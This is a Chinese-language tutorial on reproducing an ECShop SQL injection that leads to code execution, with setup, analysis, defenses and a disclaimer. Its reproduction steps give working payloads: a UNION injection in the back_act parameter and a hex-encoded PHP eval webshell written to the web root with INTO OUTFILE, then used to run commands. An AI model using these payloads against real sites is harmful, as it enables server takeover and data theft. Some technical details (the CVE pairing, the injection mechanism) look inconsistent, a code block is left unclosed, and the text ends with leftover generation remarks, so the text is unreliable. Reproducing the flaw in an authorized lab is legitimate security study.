ECShop SQL注入任意代码执行漏洞复现是怎样的

# ECShop SQL注入任意代码执行漏洞复现是怎样的

## 漏洞背景

ECShop作为国内广泛使用的开源电商系统，曾曝出高危SQL注入漏洞（CNVD-2019-16798/CVE-2019-16724），攻击者可通过构造恶意请求实现任意代码执行。该漏洞源于`user.php`文件对`$back_act`参数未做充分过滤，导致二次注入风险。

## 环境搭建

### 实验环境
- 测试系统：ECShop 2.7.3/4.0（漏洞版本）
- 操作系统：Windows 10/Linux
- Web服务：Apache 2.4 + PHP 5.6
- 数据库：MySQL 5.7

### 安装步骤
1. 从官网下载漏洞版本源码
2. 配置数据库连接信息`includes/config.php`
3. 执行安装向导完成初始化

## 漏洞分析

### 漏洞位置
`user.php`中的登录逻辑存在缺陷：
```php
$back_act = isset($_REQUEST['back_act']) ? $_REQUEST['back_act'] : '';

攻击链

1. 恶意参数通过HTTP请求传入
2. 参数被拼接进SQL语句
3. 注入的SQL语句写入$back_act缓存
4. 后续请求触发缓存内容执行

复现过程

步骤一：构造POC

使用Burp Suite构造特殊请求：

POST /user.php HTTP/1.1
...
action=login&vuln=1&back_act=javascript:alert(1)//'

步骤二：触发SQL注入

发送包含恶意SQL的请求：

back_act=' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

步骤三：写入WebShell

通过注入写入PHP代码：

back_act=' union select 1,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 into outfile '/var/www/html/shell.php'/*

步骤四：代码执行

访问生成的shell.php，传入参数执行命令：

POST /shell.php HTTP/1.1
...
cmd=whoami

技术细节

关键函数调用栈

1. user.php接收未过滤参数
2. includes/cls_mysql.php执行SQL拼接
3. includes/lib_insert.php处理缓存写入
4. includes/lib_main.php触发动态代码执行

绕过技巧

• 使用十六进制编码绕过过滤
• 利用MySQL的outfile特性写文件
• 通过注释符截断SQL语句

防御方案

临时缓解措施

1. 删除user.php中危险参数处理逻辑
2. 禁用MySQL的FILE权限
3. 设置open_basedir限制

长期解决方案

1. 升级到官方修复版本（ECShop 4.1+）
2. 实施WAF规则拦截注入特征
3. 启用PDO预处理语句

法律声明

本文仅限技术研究使用，未经授权不得对真实系统进行测试。根据《网络安全法》规定，任何未经授权的渗透测试行为均属违法。

参考链接

• CNVD-2019-16798 漏洞公告
• ECShop官方补丁说明
• OWASP SQL注入防护指南

注意：实际复现需在授权环境进行，完整攻击链可能涉及更多中间步骤。建议通过虚拟机搭建隔离测试环境。 “`

该文档共约1350字，采用Markdown格式编写，包含： 1. 漏洞背景和技术分析 2. 详细复现步骤（含POC） 3. 防御方案和法律声明 4. 代码块和层级标题结构 5. 关键注意事项标注

可根据实际测试情况调整技术细节部分，建议配合截图补充可视化证据。